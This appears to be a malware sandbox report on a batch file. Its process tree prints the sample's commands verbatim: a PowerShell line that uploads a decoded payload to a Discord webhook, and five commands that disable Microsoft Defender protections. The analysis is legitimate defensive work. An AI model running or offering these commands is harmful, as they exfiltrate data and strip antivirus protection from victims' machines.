Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
19/09/2023, 03:08
Static task
static1
Behavioral task
behavioral1
Sample
riverrr.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
riverrr.bat
Resource
win10v2004-20230915-en
General
-
Target
riverrr.bat
-
Size
5KB
-
MD5
fc498e2bdba1e606ec3a8279694de87a
-
SHA1
005a4e7517f8760b92bf92255224c3a51a9d5cf6
-
SHA256
93e8750b3a7c51c0f588908f39d89e1e51650c475c9376ed3f71e7c9945ed00a
-
SHA512
8b3dc61a95224129da7df6240cde12aa4dcf20fc0e37d277f1d92d152f537a751ee11eb4d8281335cb3eb728b4810d38c73914435167cd8e8f29d8e0139401be
-
SSDEEP
96:OyPPks5E5hngSMz6p5dvxiaXa05CACvEMRu5CECvElCw2+c:tPPQrp5dvkaXa05CACvEMI5CECvEMw4
Malware Config
Extracted
https://discord.com/api/webhooks/1152857858543718450/qR3bD0V-wMFzOw9cnKsF3KjME7YhDRXOkZep_Oy4ztLtCIN3pK5i3wdOMzSNp6Ry3Xvv
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1732 powershell.exe 4 1732 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1732 powershell.exe 2684 powershell.exe 2804 powershell.exe 2496 powershell.exe 1060 powershell.exe 2924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 2496 powershell.exe Token: SeDebugPrivilege 1060 powershell.exe Token: SeDebugPrivilege 2924 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1968 wrote to memory of 1732 1968 cmd.exe 29 PID 1968 wrote to memory of 1732 1968 cmd.exe 29 PID 1968 wrote to memory of 1732 1968 cmd.exe 29 PID 1968 wrote to memory of 2684 1968 cmd.exe 30 PID 1968 wrote to memory of 2684 1968 cmd.exe 30 PID 1968 wrote to memory of 2684 1968 cmd.exe 30 PID 1968 wrote to memory of 2804 1968 cmd.exe 31 PID 1968 wrote to memory of 2804 1968 cmd.exe 31 PID 1968 wrote to memory of 2804 1968 cmd.exe 31 PID 1968 wrote to memory of 2496 1968 cmd.exe 32 PID 1968 wrote to memory of 2496 1968 cmd.exe 32 PID 1968 wrote to memory of 2496 1968 cmd.exe 32 PID 1968 wrote to memory of 1060 1968 cmd.exe 33 PID 1968 wrote to memory of 1060 1968 cmd.exe 33 PID 1968 wrote to memory of 1060 1968 cmd.exe 33 PID 1968 wrote to memory of 2924 1968 cmd.exe 34 PID 1968 wrote to memory of 2924 1968 cmd.exe 34 PID 1968 wrote to memory of 2924 1968 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\riverrr.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$client = New-Object System.Net.WebClient;$client.UploadString('https://discord.com/api/webhooks/1152857858543718450/qR3bD0V-wMFzOw9cnKsF3KjME7YhDRXOkZep_Oy4ztLtCIN3pK5i3wdOMzSNp6Ry3Xvv',(New-Object System.Text.ASCIIEncoding).GetString([System.Convert]::FromBase64String('JABzAD0AcwB0AGEAbgBzAC4AbgBlAHQALgBXAGUAYgBvAGQAZQBjAHQAIAB8ACAAWwBTAHQAYQBuAHMAaABWAGUAZQBtAGUAbgB0AC4ARwBlAGQAdAAuAE4AZQB0AFMAbwBmAHQAXQAuAEcAZQB0AEYAaQBsAGUAUwB0AGEAbgBzAHQAaQB0ACgAJABDAG8AbQBwAHIAZQBzAHMAKQA=')))"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Set-MpPreference -DisableIOAVProtection $true"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Set-MpPreference -DisableArchiveScanning $true"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Set-MpPreference -DisableBehaviorMonitoring $true"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Set-MpPreference -DisableRemovableDriveScanning $true"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d2ea139d4970410fcb9ed35f81835526
SHA1b7a13ea30e42ea326d88ac6955ab8b0a621814f2
SHA25636918d04a2b6f52858355532512e4d3dde85cbc0b0715faff62eba7438544fc2
SHA512afd32ba554eaab19fc3efdada7ad77b4fb501cc5512b355a976223d741caa88914309eac96d6e308683265d6c846a6e244f6abc00fcbb3fef177f1fe44d843c5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d2ea139d4970410fcb9ed35f81835526
SHA1b7a13ea30e42ea326d88ac6955ab8b0a621814f2
SHA25636918d04a2b6f52858355532512e4d3dde85cbc0b0715faff62eba7438544fc2
SHA512afd32ba554eaab19fc3efdada7ad77b4fb501cc5512b355a976223d741caa88914309eac96d6e308683265d6c846a6e244f6abc00fcbb3fef177f1fe44d843c5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d2ea139d4970410fcb9ed35f81835526
SHA1b7a13ea30e42ea326d88ac6955ab8b0a621814f2
SHA25636918d04a2b6f52858355532512e4d3dde85cbc0b0715faff62eba7438544fc2
SHA512afd32ba554eaab19fc3efdada7ad77b4fb501cc5512b355a976223d741caa88914309eac96d6e308683265d6c846a6e244f6abc00fcbb3fef177f1fe44d843c5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d2ea139d4970410fcb9ed35f81835526
SHA1b7a13ea30e42ea326d88ac6955ab8b0a621814f2
SHA25636918d04a2b6f52858355532512e4d3dde85cbc0b0715faff62eba7438544fc2
SHA512afd32ba554eaab19fc3efdada7ad77b4fb501cc5512b355a976223d741caa88914309eac96d6e308683265d6c846a6e244f6abc00fcbb3fef177f1fe44d843c5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d2ea139d4970410fcb9ed35f81835526
SHA1b7a13ea30e42ea326d88ac6955ab8b0a621814f2
SHA25636918d04a2b6f52858355532512e4d3dde85cbc0b0715faff62eba7438544fc2
SHA512afd32ba554eaab19fc3efdada7ad77b4fb501cc5512b355a976223d741caa88914309eac96d6e308683265d6c846a6e244f6abc00fcbb3fef177f1fe44d843c5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NAAZ272V2QQ0RIN2MABS.temp
Filesize7KB
MD5d2ea139d4970410fcb9ed35f81835526
SHA1b7a13ea30e42ea326d88ac6955ab8b0a621814f2
SHA25636918d04a2b6f52858355532512e4d3dde85cbc0b0715faff62eba7438544fc2
SHA512afd32ba554eaab19fc3efdada7ad77b4fb501cc5512b355a976223d741caa88914309eac96d6e308683265d6c846a6e244f6abc00fcbb3fef177f1fe44d843c5